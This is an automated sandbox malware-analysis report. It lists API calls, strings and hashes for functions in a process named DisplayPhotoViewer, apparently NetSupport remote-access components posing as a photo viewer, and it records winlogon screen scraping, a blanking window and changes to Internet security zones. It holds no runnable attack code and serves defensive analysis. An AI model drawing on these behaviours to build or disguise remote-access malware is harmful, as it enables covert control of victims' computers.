                                                                                                    • DeleteObject.GDI32(00000000), ref: 110AD944
                                                                                                    • SetEvent.KERNEL32(?), ref: 110AD94E
                                                                                                    • DeleteDC.GDI32(00000000), ref: 110AD958
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110AD964
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 110AD96E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110AD975
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110AD999
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                    • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                    • API String ID: 2071925733-2101319552
                                                                                                    • Opcode ID: 3aa07fff700c9852addd13dc1c0aa57167f38fc9f4b13a318c7a0e3636a6e2bf
                                                                                                    • Instruction ID: 8bf283354a7abfec1562c2065db5c14c4a1943bdcee64d7f1dfe756718e88c34
                                                                                                    • Opcode Fuzzy Hash: 3aa07fff700c9852addd13dc1c0aa57167f38fc9f4b13a318c7a0e3636a6e2bf
                                                                                                    • Instruction Fuzzy Hash: 6B518275E00625ABDB11DFE4DC89FAEFBB5EB48704F108029FD15A7284DB74A901CB61
                                                                                                    Function 11003730 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 240COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000004), ref: 1100378F
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 110037AA
                                                                                                    • GetSysColor.USER32(00000010), ref: 110037BD
                                                                                                    • GetSysColor.USER32(00000010), ref: 110037D4
                                                                                                    • GetSysColor.USER32(00000014), ref: 110037EB
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003802
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003825
                                                                                                    • GetSysColor.USER32(00000014), ref: 1100383C
                                                                                                    • GetSysColor.USER32(00000010), ref: 11003853
                                                                                                    • GetSysColor.USER32(00000010), ref: 1100386A
                                                                                                    • GetSysColor.USER32(00000004), ref: 11003881
                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 11003888
                                                                                                    • InflateRect.USER32(?,000000FE,000000FD), ref: 11003896
                                                                                                    • GetSysColor.USER32(00000010), ref: 110038B2
                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 110038BB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110038C9
                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 110038E2
                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 110038F6
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11003904
                                                                                                    • DeleteObject.GDI32(?), ref: 1100390E
                                                                                                    • GetSysColor.USER32(00000014), ref: 1100391C
                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 11003925
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11003932
                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100394E
                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 11003965
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11003973
                                                                                                    • DeleteObject.GDI32(00000000), ref: 1100397A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                                    • String ID: PB)uP])u
                                                                                                    • API String ID: 1903512896-960617383
                                                                                                    • Opcode ID: c31fb9aa66fae5aa6f35688eb30ae3fe90c84a43ca7e374bcfd5523f940971d5
                                                                                                    • Instruction ID: 7a7b200571dfa9ab8619db7a921b542f9341b404ee07d42ca52b5a9c4e3b91b9
                                                                                                    • Opcode Fuzzy Hash: c31fb9aa66fae5aa6f35688eb30ae3fe90c84a43ca7e374bcfd5523f940971d5
                                                                                                    • Instruction Fuzzy Hash: 428162B5900709AFDB10DFA5CC85EBFF7B9EB88304F104A18FA11A7285D671A945CBA1
                                                                                                    Function 11133470 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 229registrylibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111334CA
                                                                                                    • GetStockObject.GDI32(00000004), ref: 111334D5
                                                                                                    • RegisterClassA.USER32(?), ref: 111334E9
                                                                                                    • GetLastError.KERNEL32 ref: 1113355F
                                                                                                    • GetLastError.KERNEL32 ref: 1113357B
                                                                                                    • CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111335E5
                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113364E
                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113367D
                                                                                                    • UpdateWindow.USER32(?), ref: 111336AB
                                                                                                    • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111336C6
                                                                                                    • SetTimer.USER32(?,00000081,00000014,00000000), ref: 1113370A
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F078C), ref: 11133714
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F078C), ref: 11133732
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
                                                                                                    • String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1116282658-2568270441
                                                                                                    • Opcode ID: 756e51f2203710efca58ada8dc261bebbab057ecdcf06e64cd36f069c7b24dc8
                                                                                                    • Instruction ID: a1abf74e8625cae0b8c317ef1e47053b4359f05afce0f253b89d040129434249
                                                                                                    • Opcode Fuzzy Hash: 756e51f2203710efca58ada8dc261bebbab057ecdcf06e64cd36f069c7b24dc8
                                                                                                    • Instruction Fuzzy Hash: B58103B4A5070AAFD711DFA5DC81F9FF7A4AB88319F10842CE619A72C4D770A9008BA5
                                                                                                    Function 11005310 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059F80: __itow.LIBCMT ref: 11059FA5
                                                                                                    • GetObjectA.GDI32(?,0000003C,?), ref: 110053E5
                                                                                                      • Part of subcall function 11107820: _malloc.LIBCMT ref: 11107829
                                                                                                      • Part of subcall function 11107820: _memset.LIBCMT ref: 11107852
                                                                                                    • wsprintfA.USER32 ref: 1100543D
                                                                                                    • DeleteObject.GDI32(?), ref: 11005492
                                                                                                    • DeleteObject.GDI32(?), ref: 1100549B
                                                                                                    • SelectObject.GDI32(?,?), ref: 110054B2
                                                                                                    • DeleteObject.GDI32(?), ref: 110054B8
                                                                                                    • DeleteDC.GDI32(?), ref: 110054BE
                                                                                                    • SelectObject.GDI32(?,?), ref: 110054CF
                                                                                                    • DeleteObject.GDI32(?), ref: 110054D8
                                                                                                    • DeleteDC.GDI32(?), ref: 110054DE
                                                                                                    • DeleteObject.GDI32(?), ref: 110054EF
                                                                                                    • DeleteObject.GDI32(?), ref: 1100551A
                                                                                                    • DeleteObject.GDI32(?), ref: 11005538
                                                                                                    • DeleteObject.GDI32(?), ref: 11005541
                                                                                                    • ShowWindow.USER32(?,00000009), ref: 1100556F
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 11005577
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                    • API String ID: 2789700732-770455996
                                                                                                    • Opcode ID: fec02068b2684296c16b85fa3c25e5961b221962ca71974b36209499a0cae8bc
                                                                                                    • Instruction ID: 84781bfd7d2d737226d3b37634ef14c400015b9ceacc9a2dd348c07d7d3561ef
                                                                                                    • Opcode Fuzzy Hash: fec02068b2684296c16b85fa3c25e5961b221962ca71974b36209499a0cae8bc
                                                                                                    • Instruction Fuzzy Hash: 2B811975A00A05ABD764DBA5CC90EABF7FAAF8C704F00854CF59697241EA71F901CF60
                                                                                                    Function 11123180 Relevance: 43.9, APIs: 11, Strings: 14, Instructions: 186libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(WSOCK32.DLL,?,?,00000000), ref: 111231B0
                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 111231C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 111231E1
                                                                                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112320A
                                                                                                    • GetProcAddress.KERNEL32(00000000,gethostname), ref: 1112322D
                                                                                                    • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 11123256
                                                                                                    • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112327B
                                                                                                    • _calloc.LIBCMT ref: 1112330A
                                                                                                    • _calloc.LIBCMT ref: 111233DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad_calloc
                                                                                                    • String ID: ..\CTL32\tcputil.c$WSACleanup$WSAStartup$WSOCK32.DLL$gethostbyname$gethostname$ntohl$pGetHostByName$pGetHostName$pWSACleanup$pWSAStartup$pntohl$result$ws2_32.dll
                                                                                                    • API String ID: 1641450247-2903367685
                                                                                                    • Opcode ID: 7cb993d1e83e9a4ae996b1ef20a03ce235162ba660d37093ef0d146e9403f19f
                                                                                                    • Instruction ID: 6087d00816ff521a7ede89fa13ef7d6fec39fc4c939a8a783be3bf39d6db7d70
                                                                                                    • Opcode Fuzzy Hash: 7cb993d1e83e9a4ae996b1ef20a03ce235162ba660d37093ef0d146e9403f19f
                                                                                                    • Instruction Fuzzy Hash: 2D51F479F5835AABD7109F75AC84B8DFBA8AF18704F5040A5E809E7241EF30DA40CF91
                                                                                                    Function 11015190 Relevance: 43.7, APIs: 29, Instructions: 170COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(?,?), ref: 110151BF
                                                                                                    • GetWindowRect.USER32(?,?), ref: 110151D7
                                                                                                    • _memset.LIBCMT ref: 110151E5
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11015201
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11015215
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015220
                                                                                                    • BeginPath.GDI32(00000000), ref: 1101522D
                                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015250
                                                                                                    • EndPath.GDI32(00000000), ref: 11015257
                                                                                                    • PathToRegion.GDI32(00000000), ref: 1101525E
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015270
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015286
                                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 110152A0
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110152AE
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110152BE
                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110152CB
                                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110152EA
                                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110152F9
                                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101530C
                                                                                                    • DeleteObject.GDI32(00000000), ref: 11015319
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015323
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101532D
                                                                                                    • DeleteObject.GDI32(?), ref: 11015336
                                                                                                    • DeleteObject.GDI32(?), ref: 1101533F
                                                                                                    • DeleteObject.GDI32(?), ref: 11015348
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015352
                                                                                                    • DeleteObject.GDI32(?), ref: 1101535B
                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015365
                                                                                                    • EndPaint.USER32(?,?), ref: 11015379
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702029449-0
                                                                                                    • Opcode ID: 2420055481e3087034d74504e6d6d1f2a4fcafd9da687936ea4821084bf5318b
                                                                                                    • Instruction ID: c89f8f6d2c297e06aa031e3ba13a6c291ea51ce0acca84c20c64d9c01cb23816
                                                                                                    • Opcode Fuzzy Hash: 2420055481e3087034d74504e6d6d1f2a4fcafd9da687936ea4821084bf5318b
                                                                                                    • Instruction Fuzzy Hash: 2C510C75A01228AFDB11DBA4DC89FAEB7B9FF89304F008199F919D7244DB749A40CF61
                                                                                                    Function 10702C40 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 144libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 10701A40: GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 10701A6D
                                                                                                      • Part of subcall function 10701A40: wsprintfA.USER32 ref: 10701AA7
                                                                                                    • LoadLibraryA.KERNEL32(CAPI2032.DLL), ref: 10702CBE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileLibraryLoadModuleNamewsprintf
                                                                                                    • String ID: *TraceCAPIData$CAPI2032.DLL$CAPI_GET_MESSAGE$CAPI_PUT_MESSAGE$CAPI_REGISTER$CAPI_RELEASE$CAPI_WAIT_FOR_SIGNAL$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$PCICAPI$hCapiInst == 0$hDataRead$hDataSent
                                                                                                    • API String ID: 2847869325-2115638456
                                                                                                    • Opcode ID: e3587d23cc25a2f6e2666d4714a1e94978e5458b5bd036f90ed6d2df47c088e0
                                                                                                    • Instruction ID: bb0bce3ff9b39605e519b0173b4f6ac2e7c18a95d600b38cca7560323b6237f2
                                                                                                    • Opcode Fuzzy Hash: e3587d23cc25a2f6e2666d4714a1e94978e5458b5bd036f90ed6d2df47c088e0
                                                                                                    • Instruction Fuzzy Hash: F74181B1A00124AFC750EF69ECC5D5A7BECEB8D710B04861BF904D76E0DBB458928B99
                                                                                                    Function 110BB3E0 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 263librarycomloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C), ref: 110BB40D
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110BB451
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110BB46C
                                                                                                    • SystemParametersInfoA.USER32(00000010,00000000,?,00000000), ref: 110BB483
                                                                                                    • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110BB48F
                                                                                                    • OleInitialize.OLE32(00000000), ref: 110BB4CB
                                                                                                    • LoadAcceleratorsA.USER32(00000000,00003330), ref: 110BB593
                                                                                                    • UpdateWindow.USER32(?), ref: 110BB5FD
                                                                                                    • OleUninitialize.OLE32 ref: 110BB67E
                                                                                                    • GetProcAddress.KERNEL32(?,SetThreadExecutionState), ref: 110BB692
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110BB6AA
                                                                                                    • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 110BB6BB
                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 110BB6E9
                                                                                                      • Part of subcall function 110B4C40: GetWindowPlacement.USER32(?,0000002C,75BF7AA0), ref: 110B4C7F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem$AddressErrorLastLibraryLoadProcWindow$AcceleratorsFreeInitializePlacementUninitializeUpdate
                                                                                                    • String ID: ..\CTL32\NSMCobrowse.cpp$1601$FALSE$Kernel32.dll$NSMCobrowse$SetThreadExecutionState$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 3244972839-2715558161
                                                                                                    • Opcode ID: 7f52ecf40b297e53c9b4e9c1e6d8453b61dafc84af1a0769bdafa4072ebf4ef3
                                                                                                    • Instruction ID: 26fd531c787839105b2f7391d4ac46bcb53eb714db5ed801b511f777656faf0a
                                                                                                    • Opcode Fuzzy Hash: 7f52ecf40b297e53c9b4e9c1e6d8453b61dafc84af1a0769bdafa4072ebf4ef3
                                                                                                    • Instruction Fuzzy Hash: 3F91A8B9E00619AFDB11DFA9CCC0AAEFBF5FF48308F50446DE915A7241DB3469408BA5
                                                                                                    Function 11123800 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 153libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(snmpapi.dll,?,00000000), ref: 11123829
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpUtilOidCpy), ref: 11123854
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpUtilOidNCmp), ref: 11123861
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpUtilVarBindFree), ref: 1112386E
